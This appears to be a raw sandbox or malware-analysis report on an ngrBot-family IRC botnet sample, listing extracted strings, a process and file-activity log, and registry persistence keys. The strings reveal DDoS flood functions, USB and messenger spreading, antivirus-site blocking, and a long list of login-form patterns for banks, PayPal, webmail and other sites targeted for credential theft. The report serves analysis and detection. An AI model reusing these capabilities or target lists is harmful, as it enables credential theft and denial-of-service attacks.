%s<br />JOIN %s %s<br />PART %s<br />PRIVMSG %s :%s<br />QUIT :%s<br />PONG %s<br />PING<br />PRIVMSG<br />[v="%s" c="%s" h="%s" p="%S"]<br />[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d<br />[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d<br />[Slowloris]: Starting flood on "%s" for %d minute(s)<br />[Slowloris]: Finished flood on "%s"<br />[UDP]: Starting flood on "%s:%d" for %d second(s)<br />[UDP]: Finished flood on "%s:%d"<br />[SYN]: Starting flood on "%s:%d" for %d second(s)<br />[SYN]: Finished flood on "%s:%d"<br />[USB]: Infected %s<br />[MSN]: Updated MSN spread message to "%s"<br />[MSN]: Updated MSN spread inte<br />rval to "%s"<br />[HTTP]: Updated HTTP spread message to "%s"<br />[HTTP]: Injected value is now %s.<br />[HTTP]: Updated HTTP spread interval to "%s"<br />[Visit]: Visited "%s"<br />[DNS]: Blocked "%s"<br />[usb="%d" msn="%d" http="%d" total="%d"]<br />[ftp="%d" pop="%d" http="%d" total="%d"]<br />[RSOCK4]: Started rsock4 on "%s:%d"<br />[RSOCK4]: Stopped rsock4<br />[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)<br />[d="%s"] Error downloading file [e="%d"]<br />[d="%s"] Error writing download to "%S" [e="%d"]<br />[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]<br />[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]<br />[d="%s"] Error getting temporary filename. [e="%d"]<br />[d='%s"] Error getting application data path [e="%d"]<br />[Visit]: Error visitng "%s"<br />[FTP Login]: %s<br />[POP3 Login]: %s<br />[FTP Infect]: %s was iframed<br />[HTTP Login]: %s<br />[HTTP Traffic]: %s<br />[Ruskill]: Detected File: "%s"<br />[Ruskill]: Detected DNS: "%s"<br />[Ruskill]: Detected Reg: "%s"<br />[PDef+]: %s<br />[DNS]: Blocked DNS "%s"<br />[MSN]: %s<br />[HTTP]: %s<br />ftplog<br />poplog<br />ftpinfect<br />httplogin<br />httptraff<br />ruskill<br />rdns<br />rreg<br />httpspread<br />http://api.wipmania.com/<br />\\.\pipe\%08x_ipc<br />0;0G0O0V0d0n0s0<br />1)13181Y1e1u1|1<br />2C2c2<br />3 363M3j3u3<br />6(6/686J6O6T6m6<br />7 7(7O7V7_7<br />7=8T8\8<br />9#9:9W9^9f9~9<br />98:R:[:<br />;U<e<j<p<<br /><g=o=<br />>*>N><br />?%?/?6?A?P?<br />0<0E0L0S0c0i0t0{0<br />2!3-4d4n4s4<br />5(5:5?5D5a5x5<br />6 6J6a6<br />7&7.7>7I7N7f7<br />1#2_2<br />8"8Q8X8g8q8<br />9':;:Y:<br /><'<1<H<X<x<<br />=%=7=D=K=Z=w=}=<br />>@>R>\>m><br />?1?<?B?j?<br />0g0g1<br />1"2Q2~2<br />203N3<br />424>4^4<br />8;9~9<br />:K:';A;_;<br /><4<><T<^<h<<br />=*=>=D=N=l=u=<br />>#>)>8>>>O>Y>^>p>u><br />?8?L?c?u?<br />0$1-1H1N1_1n1<br />313Y3k3<br />414l4<br />515B5P5u5<br />676V6_6f6v6<br />889Y9r9<br />:-:G:<br />;#;(;2;7;<;A;F;W;<br /><5<?<^<<br /><W=l=|=<br />=d>o>{><br />?/?U?`?p?<br />1P2T2X2<br />3?4a4h4<br />5A5H5|5<br />7U8]8f8}8<br />9'9-939q9<br />: :%:n:<br />;1;J;d;<br /><%<3<<<B<i<v<<br />=$=+=0===E=L=T=o=v=<br />=6>E><br />?%?4?\?<br />0'0K0\0s0x0}0<br />091M1g1t1<br />3[3q3<br />3*494<br />4-575w5~5<br />5B6L6<br />6(7I7]7z7<br />848_9m9w9<br />:+:1:7:D:Q:V:e:t:<br />; ;,;8;L;Q;V;n;s;x;};<br />;5<B<]<w<<br />=5===B=N=S=g=l=<br />5"6-6B6L6Q6c6u6<br />7 70767=7L7R7<br />94:{:<br />'010<br />1.1F1^1<br />2(2>2P2b2t2<br />4K5f5<br />6=6K6Y6<br />7*7/7L7S7r7<br />8]8i8<br />9+9;9A9G9d9q9w9}9<br />9/:b:h:<br />;!;S;`;h;s;<br />;E<e<w<<br />=.=<=A=F=L=R=k=u=<br />>#>,>X><br />?-?\?y?<br />42484T4`4f4<br />4X5]5|5<br />6-646D6Q6[6b6g6q6z6<br />9 9&9<9G9R9W9\9q9v9<br />9::G:M:b:j:z:<br />;.;6;;;B;H;S;c;k;<br /><+<F<T<`<<br />=3=E=Q=<br />>3>T>k>z><br />?Z?r?{?<br />%0<0V0h0<br />141>1l1<br />3g3r3<br />3\4c4<br />5*585R5w5<br />6!6<6R6a6<br />7=7C7T7g7z7<br />8-9L9w9<br />9-:D:W:<br />;#;4;:;T;Z;<br /><#<(<-<2<7<P<j<w<<br />=)=.=K=[=`=}=<br />>+>I>V>[>s>z><br />?*?H?T?a?g?u?<br />0,0J0Z0g0l0v0<br />1%101=1C1I1W1s1y1<br />2'212<2J2_2<br />3"3@3P3V3<br />4)4J4h4x4<br />535Q5s5<br />6!6.656D6S6`6m6z6<br />7?7E7<br />7'8,818[8w8<br />8.9K9V9s9<br />:':,:D:T:Y:r:<br />;2;7;W;r;w;|;<br /><$<5<<<F<N<b<<br />=(=I=O=Z=r=|=<br />>V>g>|><br />>#?h?<br />0-070D0x0<br />0@1G1<br />132D2Z2p2<br />3*343=3R3^3<br />3-434=4F5P5]5<br />536N6[6<br />637B7U7d7q7<br />818>8T8]8|8<br />9T9`9o9u9z9<br />:!:,:3:;:A:O:Y:f:l:r:<br />;(;3;9;?;Q;];c;i;{;<br /><&<3<8<G<T<Z<`<n<<br /><,=3=A=G=W=w=|=<br />>@>E>\><br />>W?`?<br />010C0H0M0a0f0k0<br />1 1$1<1M1U1<br />1-2O2z2<br />3I3Z3o3z3<br />4"4'4<4U4_4t4z4<br />575=5r5|5<br />6(6=6P6m6z6<br />7 767<7~7<br />8A8F8Y8c8j8<br />999C9<br />:%:,:3:=:F:e:<br />;+;=;D;X;];c;i;n;<br />;.<4<;<@<e<p<w<<br />="=*=0=;=F=O=Z=b=g=v={=<br />=7>N>W>]><br />>&?7?~?<br />40;0A0Q0a0<br />2)2A2[2<br />2T3]3f5<br />6F6Y6t6<br />7I7Y7_7e7k7q7w7}7<br />8*808;8~8<br />9 9O9X9^9<br />9$:0:Q:<br />:&;2;8;F;<br /><"<2<=<Q<W<i<<br />=$=*=4=:=E=K=S=e=<br />>;>I><br />?!?F?M?W?<br />1$1<1I1[1g1<br />2%2>2V2a2t2|2<br />373E3M3a3l3<br />3@4N4U4<br />5/565<5R5k5<br />666i6<br />7.7M7<br />8,818M8[8`8<br />8?9R9<br />:#:4:9:?:E:P:{:<br />;#;B;U;[;b;r;<br /><!<o<<br />=$=;=C=N=S=X=i=n=s=}=<br />>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|><br />?B?H?N?T?Z?`?f?l?r?x?~?<br />4 4$4(4,4044484<4@4D4H4L4P4T4X6\6`6h6l6p6t6x6|6<br />7D7L7X7\7`7d7h7l7p7t7<br />9(949@9L9X9d9p9|9<br />:$:0:<:H:T:`:l:x:<br />; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;<br />4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4<br />5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5<br />6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6<br />7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7<br />8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8<br />8 9,989D9P9\9h9x9|9<br />: :(:,:0:8:<:@:X:`:d:h:l:p:x:|:<br />; ;$;(;,;0;8;<;@;D;H;P;T;X;\;`;h;l;p;t;x;<br />< <(<,<0<4<8<@<D<H<L<P<X<\<`<d<h<p<t<|<<br />=(=0=8=@=H=T=\=d=l=<br /><br />Unicode Strings:<br />---------------------------------------------------------------------------<br />Ajjj<br />jjjj<br />jjjj<br />jjjj<br />$jjj<br />Ajjj<br />DBWIN<br />\\.\pipe<br />kernel32.dll<br />ntdll.dll<br />Internet Explorer\iexplore.exe<br />autorun.inf<br />pidgin.exe<br />wlcomm.exe<br />msnmsgr.exe<br />msmsgs.exe<br />flock.ex<br />opera.exe<br />chrome.exe<br />ieuser.exe<br />iexplore.exe<br />firefox.exe<br />HKCU\<br />HKLM\<br />Microsoft Unified Security Protocol Provider<br />.ipconfig.exe<br />verclsid.exe<br />regedit.exe<br />rundll32.exe<br />cmd.exe<br />regsvr32.exe<br />l"%s" %S<br />POST<br />.exe<br />lol.exe<br />n127.0.0.1<br />%s:Zone.Identifier<br />wininet.dll<br />secur32.dll<br />ws2_32.dll<br />:%S%S\Desktop.ini<br />winlogon.exe<br />explorer.exe<br />Aadvapi32.dll<br />urlmon.dll<br />nspr4.dll<br />dnsapi.dll<br />Akernel23.dll<br />y%s\%s.exe<br />lsass.exe<br />Shell<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Policies\System<br />.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run<br /><br /></code></pre><br />31upjmrlzz.exe<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Processes:<br />PID ParentPID User Path <br />--------------------------------------------------<br />768 1176 C:\Documents and Settings\Mes documents\31upjmrlzz.exe <br /><br />Ports:<br />Port PID Type Path <br />--------------------------------------------------<br /><br />Explorer Dlls:<br />DLL Path Company Name File Description <br />--------------------------------------------------<br />No changes Found <br /><br />IE Dlls:<br />DLL Path Company Name File Description <br />--------------------------------------------------<br />No changes Found <br /><br />Loaded Drivers:<br />Driver File Company Name Description <br />--------------------------------------------------<br /><br />Monitored RegKeys<br />Registry Key Value <br />--------------------------------------------------<br /><br />Kernel31 Api Log<br /> <br />--------------------------------------------------<br />***** Installing Hooks ***** <br />719f74df RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters) <br />719f80c4 RegOpenKeyExA (Protocol_Catalog9) <br />719f777e RegOpenKeyExA (00000095) <br />719f764d RegOpenKeyExA (Catalog_Entries) <br />719f7cea RegOpenKeyExA (000000000001) <br />719f7cea RegOpenKeyExA (000000000002) <br />719f7cea RegOpenKeyExA (000000000003) <br />719f7cea RegOpenKeyExA (000000000004) <br />719f7cea RegOpenKeyExA (000000000005) <br />719f7cea RegOpenKeyExA (000000000006) <br />719f7cea RegOpenKeyExA (000000000007) <br />719f7cea RegOpenKeyExA (000000000008) <br />719f7cea RegOpenKeyExA (000000000009) <br />719f7cea RegOpenKeyExA (000000000010) <br />719f7cea RegOpenKeyExA (000000000011) <br />719f7cea RegOpenKeyExA (000000000012) <br />719f7cea RegOpenKeyExA (000000000013) <br />719f7cea RegOpenKeyExA (000000000014) <br />719f7cea RegOpenKeyExA (000000000015) <br />719f7cea RegOpenKeyExA (000000000016) <br />719f7cea RegOpenKeyExA (000000000017) <br />719f7cea RegOpenKeyExA (000000000018) <br />719f7cea RegOpenKeyExA (000000000019) <br />719f2623 WaitForSingleObject(77c,0) <br />719f87c6 RegOpenKeyExA (NameSpace_Catalog5) <br />719f777e RegOpenKeyExA (00000039) <br />719f835b RegOpenKeyExA (Catalog_Entries) <br />719f84ef RegOpenKeyExA (000000000001) <br />719f84ef RegOpenKeyExA (000000000002) <br />719f84ef RegOpenKeyExA (000000000003) <br />719f84ef RegOpenKeyExA (000000000004) <br />719f2623 WaitForSingleObject(774,0) <br />719e1af2 RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters) <br />719e198e GlobalAlloc() <br />7c80b72f ExitThread() <br />7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000 <br />7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000 <br />73371c38 GetCommandLineA() <br />73372f57 CreateMutex((null)) <br />7d23eab5 WaitForSingleObject(764,7530) <br />410df8 LoadLibraryA(KERNEL32.DLL)=7c800000 <br />410df8 LoadLibraryA(MSVBVM60.DLL )=73370000 <br />733739f4 GetCommandLineA() <br />7338d1b3 LoadLibraryA(C:\WINDOWS\system32\VB6FR.DLL)=0 <br />7337452c GetVersionExA() <br />7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000 <br />772370b9 GetVersionExA() <br />7723711c GetCommandLineA() <br />7337476c LoadLibraryA(SXS.DLL)=77210000 <br />774efa66 LoadLibraryA(oleaut32.dll)=770e0000 <br />73376792 RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) <br />77daeff6 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) <br />770fc957 LoadLibraryA(C:\WINDOWS\system32\kernel32.dll)=7c800000 <br />7337a15b LoadLibraryA(kernel32.dll)=7c800000 <br />406f1e LoadLibraryA(kernel32)=7c800000 <br />7337a15b LoadLibraryA(kernel32)=7c800000 <br />7337a15b LoadLibraryA(USER32)=7e390000 <br />7345d09c CreateFileA(C:\Documents and Settings\Mes documents\31upjmrlzz.exe) <br />7345d34f ReadFile() <br />406f1e LoadLibraryA(NTDLL)=7c910000 <br />7c8165b3 WaitForSingleObject(74c,64) <br />7c8191f8 LoadLibraryA(advapi32.dll)=77da0000 <br />7337a4c5 GetCurrentProcessId()=1176 <br />7337bdfa RegOpenKeyExA (HKLM\Software\Microsoft\Windows) <br />7337be1c RegOpenKeyExA (HTML Help) <br />7337be1c RegOpenKeyExA (Help) <br />7337c9ce WaitForSingleObject(7e4,ffffffff) <br />73373657 ExitProcess() <br />***** Injected Process Terminated ***** <br /><br />DirwatchData<br /> <br />--------------------------------------------------<br />WatchDir Initilized OK <br />Watching C:\DOCUME~1\LOCALS~1\Temp <br />Watching C:\WINDOWS <br />Watching C:\Program Files <br />Created: C:\WINDOWS\Prefetch\31UPJMRLZZ.EXE-1EE360EA.pf <br />Modifed: C:\WINDOWS\Prefetch\31UPJMRLZZ.EXE-1EE360EA.pf <br />Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET49CB.tmp <br />Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET37.tmp <br />Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET37.tmp <br />Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET49CB.tmp <br />File: 31upjmrlzz.exe<br />Size: 116236 Bytes<br />MD5: 9702091B21C1A48955A5268D07E31EF6<br />Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe<br /><br />File Properties: CompanyName <br />FileDescription <br />FileVersion <br />InternalName <br />LegalCopyright <br />OriginalFilename <br />ProductName <br />ProductVersion <br /><br />Exploit Signatures:<br />---------------------------------------------------------------------------<br />Scanning for 19 signatures<br />Scan Complete: 312Kb in 0,032 seconds<br />Urls<br />--------------------------------------------------<br />http://%s/%s<br />http://%s/<br />http://<br />http://api.wipmania.com/ftp://%s:%s@%s:%d<br /><br />RegKeys<br />--------------------------------------------------<br />gdatasoftware.<br />sunbeltsoftware.<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Policies\System<br />.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run<br /><br />ExeRefs<br />--------------------------------------------------<br />File: 31upjmrlzz_dmp.exe_<br />.exe<br />%windir%\system32\cmd.exe<br />&&%%windir%%\explorer.exe %%cd%%%s<br />%0x.exe<br />Internet Explorer\iexplore.exe<br />pidgin.exe<br />wlcomm.exe<br />msnmsgr.exe<br />msmsgs.exe<br />opera.exe<br />chrome.exe<br />ieuser.exe<br />iexplore.exe<br />firefox.exe<br />.ipconfig.exe<br />verclsid.exe<br />regedit.exe<br />rundll32.exe<br />cmd.exe<br />regsvr32.exe<br />.exe<br />lol.exe<br />winlogon.exe<br />explorer.exe<br />y%s\%s.exe<br />lsass.exe<br /><br />Raw Strings:<br />--------------------------------------------------<br />File: 31upjmrlzz_dmp.exe_<br />MD5: 42157d0a769f0335830e4646c6a00338<br />Size: 319490<br /><br />Ascii Strings:<br />---------------------------------------------------------------------------<br />!This program cannot be run in DOS mode.<br />Rich:<br />.text<br />`.rdata<br />@.data<br />.reloc<br />WPVS<br />t1h(<br />_[^]<br />QRPWV<br />RPQWV<br />QRPSV<br />txVhD<br />uaVhD<br />QRPSV<br />SVW3<br />u3h0<br />u!h(<br />u3h0<br />PQRV<br />RPQW<br />u:WhD<br />u#WhD<br />QRPW<br />RPQV<br />RPQV<br />PQRV<br />RPQW<br />RSSh<br />vG9u<br />t0WSV<br />WVRj<br />WSPQR<br />vt9u<br />t0WSV<br />WVRj<br />WSPQR<br />gfff<br />WVRj<br />PWQR<br />u3h0<br />u!h(<br />u3h0<br />>CAL <br />uGh4<br />=MSG t<br />=SDG <br />>MSG u`<br />SVW3<br />SVW3<br />9:vP<br />G;9r<br />@W;F<br />Wj h<br />t&j,j<br />Wjdj<br />F4VP<br />SWf9<br />t-f;<br />t=hH<br />_^[]<br />=pzC<br />|04+~4<br />_^[]<br />SVWP3<br />QWSVR<br />=lzC<br />QPRWS<br />RPQS<br />WQRV<br />_^[]<br />_^[]<br />un9F<br />t2j h<br />L9_@vI<br />;_@r<br />WVPQR<br />SQRj<br />STFU<br />=pzC<br />A8j@<br />QWRPV<br />B0QPV<br />=4yA<br />PQRj<br />PQRj<br />SVWh<br />STFU<br />Vh@P@<br />L9^8vE<br />;^8r<br />=pzC<br />hpP@<br />STFU<br />PL9^(v^<br />9+=pzC<br />+=pzC<br />+=pzC<br />+=pzC<br />+=pzC<br />+=pzC<br />;^(r<br />9~0v/<br />;~0r<br />9^8v;<br />:+=pzC<br />+=pzC<br />+=pzC<br />;^8r<br />9^@v2<br />:+=pzC<br />+=pzC<br />+=pzC<br />;^@r<br />tu9]<br />RVWPQ<br />uXWV<br />QVWRP<br />u$WP<br />E$_^[<br />tpVW<br />uTVW<br />E$_^[<br />E$^[<br />E$_^[<br />j&hx<br />t}hP<br />QVWh<br />95hVA<br />QVht<br />8POST<br />tWWV<br />PQWj<br />RPQVW<br />RPQVW<br />WVRPS<br />u h(<br />QWRS<br />SVWh<br />SVW3<br />95PWA<br />;5PWA<br />95PWA<br />;5PWA<br />VWQh4<br />t"j V<br />SVWh<br />=USERt<br />=PASS<br />:Uu#Vh<br />8Pu.<br />=FEATt<br />=TYPEt<br />=PASVu<br />=STATt<br />=LISTu<br />uuhh<br />ucWVh<br />RPQh<br />PQRh<br />QRPh<br />QVh:<br />Rh~f<br />_[^]<br />_[^]<br />F/PQ<br />~(WR<br />T0(RW<br />t=VW<br />Qh~f<br />u4SV<br />W$RP<br />tmQh<br />RSSh<br />t,PVQ<br />O,@PQ<br />TSVW3<br />WWWWh<br />F4RP<br />LSVW3<br />^<^[<br />V4QR<br />vJ9^,u<br />;F8v<br />N4PQ<br />F4RP<br />F@@PR<br />F,BRP<br />u-SSV<br />RSWWj<br />8httpu1<br />u$8H<br />QRVP<br />RVPQ<br />QRVP<br />RVPQ<br />=|[A<br />Qh~f<br />SVWP<br />=|[A<br />Rh~f<br />hh)A<br />h`)A<br />=|[A<br />tlWP<br />=|[A<br />tlWP<br />=|[A<br />Rh~f<br />=|[A<br />=|[A<br />_^[]<br />h0^A<br />hh^A<br />SVWj<br />_^Yj<br />QPPPPh<br />h(*A<br />SVWj,<br />Vj\P<br />[@^]<br />Vj.P<br />[@^]<br />QRRj<br />RRRRf<br />[_^]<br />SVWh<br />h0*A<br />*t2:<br />VhH*A<br />Qh4*A<br />QSV3<br />j PhxWA<br />h`*A<br />Vj#S<br />_^[]<br />Wj*P<br />^[_]<br />h0+A<br />h$+A<br />SVWh<br />VVVV<br />WWVS<br />SVW3<br />RVh-<br />@PVj<br />PVh-<br />VhH+A<br />SVW3<br />@PVj<br />RVj"W<br />hT+A<br />hT+A<br />h|+A<br />ht+A<br />Rhh+A<br />QhX+A<br />@PVR<br />Wj j+V<br /><%u2<br />VVVV<br />SVWh<br />QRPu<br />PQRu<br />h ,A<br />QRhL]A<br />PhT\A<br />Ph$]A<br />9Q@w<br />RRhh<br />h`]A<br />h`]A<br />h`]A<br />h`]A<br />Ph0]A<br />8nu8h<br />Rh0]A<br />Qh0]A<br />Rh0]A<br />Ph@]A<br />8nu8h<br />Rh@]A<br />Qh@]A<br />Rh@]A<br />htXA<br />h@XA<br />PVRQhT`A<br />PQRVh<br />RQPhT`A<br />PQRSh<br />8_^[<br />hPXA<br />h\XA<br />hHXA<br />Rh0]A<br />Rh0]A<br />Rh@]A<br />Qh@]A<br />h|,A<br />h|,A<br />hx,A<br />QhP_A<br />Qh|_A<br />hx,A<br />h(XA<br />hp,A<br />hd,A<br />h8XA<br />8httpuM<br />8:uE<br />u>8P<br />PhD,A<br />$_^[<br />Qh@`A<br /> _^[<br />h@,A<br />h(`A<br />h|bA<br />QRPh4,A<br />h`XA<br />h4XA<br />hXXA<br />hpXA<br />QRPh4,A<br />hhXA<br />RPQh4,A<br />SVWh<br />8#t"<br />RVWP<br />SVWR<br />hx,A<br />hx,A<br />hx]A<br />Qhl]A<br />PQh0]A<br />u(hl<br />Ph$]A<br />QRh0]A<br />SVW3<br />h -A<br />t"h<-A<br />t"h0-A<br />u5h(-A<br />Vh$cA<br />VhDcA<br />VhdcA<br />VhpcA<br />t)h0u<br />SVW3<br />RPhD-A<br />QRPh<br />QRPh<br />PQRhTaA<br />PQhDbA<br />PRh(aA<br />QRPh<br />SVW3<br />tRh|,A<br />uBPh<br />h`]A<br />h -A<br />PWQRh<br />SPQh<br />PSRhTaA<br />PhTaA<br />PRhDbA<br />Ph(aA<br />hx,A<br />tqCh<br />s[h5<br />ht.A<br />SWhl.A<br />hd.A<br />t'j j<br />h<.A<br />h46A<br />SVWh<br />hx,A<br />Rh$6A<br />h\/A<br />h\/A<br />tb@Ph<br />Rhd/A<br />;< t<br />SVW3<br />Wh00A<br />h 0A<br />5$iA<br />50iA<br />5<iA<br />5HiA<br />5TiA<br />5`iA<br />5liA<br />95$iA<br />6 iA<br />taVW<br />h@0A<br />hD0A<br />Ph<_A<br />|Sj 3<br />tlSSSSSSSSSShL0A<br />Phd0A<br />tU< u<br />u2Wh<br />h(3A<br />hT+A<br />hT+A<br />SVWh<br />hT+A<br />h,3A<br />u.h,3A<br />SVWh<br />RhP3A<br />PVQR<br />h@3A<br />;SDG <br />8SDG <br />h,3A<br />Qhx3A<br />RPhl3A<br />QRhT3A<br />t!WV<br />_^[]<br />hl.A<br />hd.A<br />hl.A<br />hd.A<br />h(mA<br />h(5A<br />t!h85A<br />_^t)<br />9|:~<br />:~+w:~<br />tK@boL@<br />L@iBK@<br />%s.%s<br />pdef<br />%s.%S<br />%s.Blocked "%s" from removing our bot file!<br />%s.Blocked "%S" from removing our bot file!<br />block<br />bdns<br />CreateFileW<br />0123456789ABCDEF<br />i.root-servers.org<br />%s.Blocked "%s" from moving our bot file<br />%s.Blocked "%S" from moving our bot file<br />%s.p10-> Message hijacked!<br />%s.p10-> Message to %s hijacked!<br />%s.p21-> Message hijacked!<br />msnmsg<br />msnint<br />baddr<br />X-MMS-IM-Format:<br />CAL %d %256s<br />msnu<br />Done frst<br />ngr->blocksize: %d<br />block_size: %d<br />NtFreeVirtualMemory<br />NtAllocateVirtualMemory<br />NtQuerySystemInformation<br />LdrEnumerateLoadedModules<br />NtQueryInformationProcess<br />LdrGetProcedureAddress<br />NtQueryVirtualMemory<br />LdrLoadDll<br />NtQueryInformationThread<br />LdrGetDllHandle<br />RtlAnsiStringToUnicodeString<br />\\.\pipe\%s<br />kernel32.dll<br />GetNativeSystemInfo<br />%s_%d<br />%s_0<br />%s-Mutex<br />SeDebugPrivilege<br />ntdll.dll<br />NtGetNextProcess<br />%s-pid<br />%s-comm<br />NtResumeThread<br />PONG <br />JOIN #<br />PRIVMSG #<br />%s.Blocked "%S" from creating "%S"<br />%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!<br />.exe<br />%s.Detected process "%S" sending an IRC packet to server %s:%d.<br />%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).<br />PRIVMSG %255s<br />JOIN %255s<br />PRIVMSG<br />JOIN<br />%s:%d<br />NtSetInformationProcess<br />%s.%s%s<br />%S%s%s<br />HKCU\<br />HKLM\<br />%s.%S%S<br />%S%S%S<br />state_%s<br />%s.%s (p='%S')<br />pop3://%s:%s@%s:%d<br />popgrab<br />%s:%s@%s:%d<br />anonymous<br />ftp://%s:%s@%s:%d<br />ftpgrab<br />%s.%s ->> %s (%s : %s)<br />%s.%s ->> %s : %s<br />Directadmin<br />WHCMS<br />cPanel<br />blog<br />%s-%s-%s<br />ffgrab<br />iegrab<br />%s.Blocked possible browser exploit pack call on URL '%s'<br />%s.Blocked possible browser exploit pack call on URL '%S'<br />webroot.<br />fortinet.<br />virusbuster.nprotect.<br />gdatasoftware.<br />virus.<br />precisesecurity.<br />lavasoft.<br />heck.tc<br />emsisoft.<br />onlinemalwarescanner.<br />onecare.live.<br />f-secure.<br />bullguard.<br />clamav.<br />pandasecurity.<br />sophos.<br />malwarebytes.<br />sunbeltsoftware.<br />norton.<br />norman.<br />mcafee.<br />symantec<br />comodo.<br />avast.<br />avira.<br />avg.<br />bitdefender.<br />eset.<br />kaspersky.<br />trendmicro.<br />iseclab.<br />virscan.<br />garyshood.<br />viruschief.<br />jotti.<br />threatexpert.<br />novirusthanks.<br />virustotal.<br />login[password]<br />login[username]<br />*members*.iknowthatgirl*/members*<br />IKnowThatGirl<br />*youporn.*/login*<br />YouPorn<br />*members.brazzers.com*<br />Brazzers<br />clave<br />numeroTarjeta<br />*clave=*<br />*bcointernacional*login*<br />Bcointernacional<br />*:2222/CMD_LOGIN*<br />*whcms*dologin*<br />*:2086/login*<br />*:2083/login*<br />*:2082/login*<br />*webnames.ru/*user_login*<br />Webnames<br />*dotster.com/*login*<br />Dotster<br />loginid<br />*enom.com/login*<br />Enom<br />login.Pass<br />login.User<br />*login.Pass=*<br />*1and1.com/xml/config*<br />1and1<br />token<br />*moniker.com/*Login*<br />Moniker<br />LoginPassword<br />LoginUserName<br />*LoginPassword=*<br />*namecheap.com/*login*<br />Namecheap<br />loginname<br />*godaddy.com/login*<br />Godaddy<br />Password<br />EmailName<br />*Password=*<br />*alertpay.com/login*<br />Alertpay<br />*netflix.com/*ogin*<br />Netflix<br />*thepiratebay.org/login*<br />Thepiratebay<br />*torrentleech.org/*login*<br />Torrentleech<br />*vip-file.com/*/signin-do*<br />Vip-file<br />*pas=*<br />*sms4file.com/*/signin-do*<br />Sms4file<br />*letitbit.net*<br />Letitbit<br />*what.cd/login*<br />Whatcd<br />*oron.com/login*<br />Oron<br />*filesonic.com/*login*<br />Filesonic<br />*speedyshare.com/login*<br />Speedyshare<br />*pw=*<br />*uploaded.to/*login*<br />Uploaded<br />*uploading.com/*login*<br />Uploading<br />loginUserPassword<br />loginUserName<br />*loginUserPassword=*<br />*fileserv.com/login*<br />Fileserve<br />*hotfile.com/login*<br />Hotfile<br />*4shared.com/login*<br />4shared<br />txtpass<br />txtuser<br />*txtpass=*<br />*netload.in/index*<br />Netload<br />*freakshare.com/login*<br />Freakshare<br />login_pass<br />*login_pass=*<br />*mediafire.com/*login*<br />Mediafire<br />*sendspace.com/login*<br />Sendspace<br />*megaupload.*/*login*<br />Megaupload<br />*depositfiles.*/*/login*<br />Depositfiles<br />userid<br />*signin.ebay*SignIn<br />eBay<br />*officebanking.cl/*login.asp*<br />OfficeBanking<br />*secure.logmein.*/*logincheck*<br />LogMeIn<br />session[password]<br />session[username_or_email]<br />*password]=*<br />*twitter.com/sessions<br />Twitter<br />txtPassword<br />txtEmail<br />*&txtPassword=*<br />*.moneybookers.*/*login.pl<br />Moneybookers<br />*runescape*/*weblogin*<br />Runescape<br />*dyndns*/account*<br />DynDNS<br />*&password=*<br />*no-ip*/login*<br />NoIP<br />*steampowered*/login*<br />Steam<br />quick_password<br />quick_username<br />username<br />*hackforums.*/member.php<br />Hackforums<br />email<br />*facebook.*/login.php*<br />Facebook<br />*login.yahoo.*/*login*<br />Yahoo<br />passwd<br />login<br />*passwd=*<br />*login.live.*/*post.srf*<br />Live<br />TextfieldPassword<br />TextfieldEmail<br />*TextfieldPassword=*<br />*gmx.*/*FormLogin*<br />*Passwd=*<br />Gmail<br />FLN-Password<br />FLN-UserName<br />*FLN-Password=*<br />*fastmail.*/mail/*<br />Fastmail<br />pass<br />user<br />*pass=*<br />*bigstring.*/*index.php*<br />BigString<br />screenname<br />*screenname.aol.*/login.psp*<br />password<br />loginId<br />*password=*<br />*aol.*/*login.psp*<br />Passwd<br />Email<br />*service=youtube*<br />*google.*/*ServiceLoginAuth*<br />YouTube<br />login_password<br />login_email<br />*login_password=*<br />*paypal.*/webscr?cmd=_login-submit*<br />PayPal<br />%s / ?%d HTTP/1.1<br />Host: %s<br />User-Agent: %s<br />Keep-Alive: 300<br />Connection: keep-alive<br />Content-Length: 42<br />POST<br />Mozilla/4.0<br />Connection: Close<br />X-a: b<br />\\.\PHYSICALDRIVE0<br />00100<br />SeShutdownPrivilege<br />NtShutdownSystem<br />This binary is invalid.<br />Main reasons:<br />- you stupid cracker<br />- you stupid cracker...<br />- you stupid cracker?!<br />ngrBot Error<br />shell32.dll<br />http<br />httpi<br />usbi<br />dnsapi.dll<br />DnsFlushResolverCache<br />http://%s/%s<br />http://%s/<br />HTTP<br />Host: <br />POST /%1023s<br />{%s|%s%s}%s<br 